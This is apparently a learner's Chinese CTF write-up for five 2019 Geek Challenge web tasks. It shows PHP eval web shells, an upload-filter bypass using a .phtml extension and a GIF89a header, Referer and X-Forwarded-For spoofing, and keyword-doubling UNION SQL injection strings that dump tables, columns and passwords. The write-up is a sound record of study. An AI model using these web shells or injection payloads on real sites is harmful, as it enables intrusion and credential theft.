[极客大挑战 2019]Knife
题目提示很明显了是要用菜刀或者蚁剑
csdn上有详细的安装教程,很简单,配置好后打开蚁剑,输入网址,链接密码是Syc,连接后在目录栏找到flag
[极客大挑战 2019]Http
打开题目是一个网站,查看源代码找到一个文件,点开
一串英文,能看懂,但是不影响我不会做,查看别人的wp,发现说这个来源不对,这里就需要改http的header,添加一个Referer的头
得到一个新提示,要用Syclover打开修改后得到新提示
必须从本地访问,然后看懂了不会修改,查看别人的wp发现要用一个没有的字段X-Forwarded-For:,代表从访问者的地址,后面加上127.0.0.1,得到flag
这里有burp的学习网站可以借鉴一下:https://www.iculture.cc/cybersecurity/pig=11474
[极客大挑战 2019]BuyFlag
打开还是一个网站,点击右上角进入buy flag的页面,然后抓包
抓包后看见提示
所以修改user
得到新提示
这里就用post输出password=404a,没错就是这里我卡了很长时间,就是不明白怎么用burp post输出最后在室友的帮助下,终于知道了,需要先把原来的GET改为POST
然后点ram旁边的params选中需要输出的值,点击up
然后点击go就能实现post输出
这里需要钱,那就输出money=100000000,发现数字太长不被通过,那就换个方式,用科学计数法
money=10e10,得到flag
[极客大挑战 2019]Upload
很明显是文件上传,嗯~,尝试上传一个照片,显示Not image尝试上传一个文本显示Not image,尝试上传一句话木马尝试上传最简单的<?php @eval($_POST['attack']);?>额还是不行,上号抓包
第一步把文件类型修改为:image/jpeg,同时将文件名修改为test.phtml,绕过常规php文件后缀检测
得到
说明带<?的都被ban了,尝试其他的一句话木马GIF89a? <script language="php">eval($_REQUEST[1])</script>上传成功,
一般这种题上传的都在/upload/路径上
接下来直接用蚁剑或者菜刀直接连接,连接密码就是木马REQUEST后面的值,这里是123连接就行
连接后直接在文件栏处找到flag
[极客大挑战 2019]BabySQL
登陆页面,尝试万能密码,嗯果然不行
多次测试后发现过滤了很多关键字符比如or, select,where, union
尝试绕过,使用联合注入构造?username=admin&password=admin' uunionnion sselectelect 1,2%23
发现报错,不过这次报错的内容不一样
这是猜测的列数错了,构造?username=admin&password=admin' uunionnion sselectelect 1,2,3%23
这次成功注入,接下来就是注入的正常套路了
查表:
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23
查字段:
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23
最后爆数据:
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
通过这几道题学到的东西是真的多,不会的东西还是太多了…
3971
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
